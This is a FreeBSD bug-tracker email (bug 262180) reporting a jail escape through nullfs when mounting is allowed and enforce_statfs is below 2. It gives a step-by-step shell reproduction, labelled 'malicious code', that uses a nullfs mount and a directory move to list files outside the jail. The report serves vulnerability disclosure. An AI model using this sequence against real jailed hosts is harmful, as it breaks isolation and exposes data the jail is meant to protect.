[Bug 262180] jail escaping via jal-friendly nullfs

Reply: bugzilla-noreply_a_freebsd.org: "[Bug 262180] jail escaping via jail-friendly nullfs"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 262180] jail escaping via jail-friendly nullfs"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 262180] jail escaping via jail-friendly nullfs"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 262180] jail escaping via jail-friendly nullfs"
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 262180] jail escaping via jail-friendly nullfs"
Go to: [ bottom of page ] [ top of archives ] [ this month ]

From: <bugzilla-noreply_at_freebsd.org>
Date: Thu, 24 Feb 2022 23:43:32 UTC

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=262180

            Bug ID: 262180
           Summary: jail escaping via jal-friendly nullfs
           Product: Base System
           Version: 12.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: firk@cantconnect.ru

Jail could be escaped when run with enforce_statfs<2, allow.mount=true,
allow.mount.nullfs=true.

prepare jail environment
> mkdir /j/1
> tar -c -f - /bin/ lib /libexec /sbin | tar -x -f - -C /j/1
> mkdir /j/1/tmp

start a vulnerable jail
> jail -c path=/j/1 persist=false allow.mount=true allow.mount.nullfs=true enforce_statfs=1 command=/bin/sh

malicious code
> mkdir /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
> mount -t nullfs /tmp/a/b/c /tmp/a/d
> cd /tmp/a/d/test
> mv /tmp/a/b/c/test /tmp/a/b/test
> ls -al ../../../../..
> ls -al ../../../../../..

you will see the files outside the jail

-- 
You are receiving this mail because:
You are the assignee for the bug.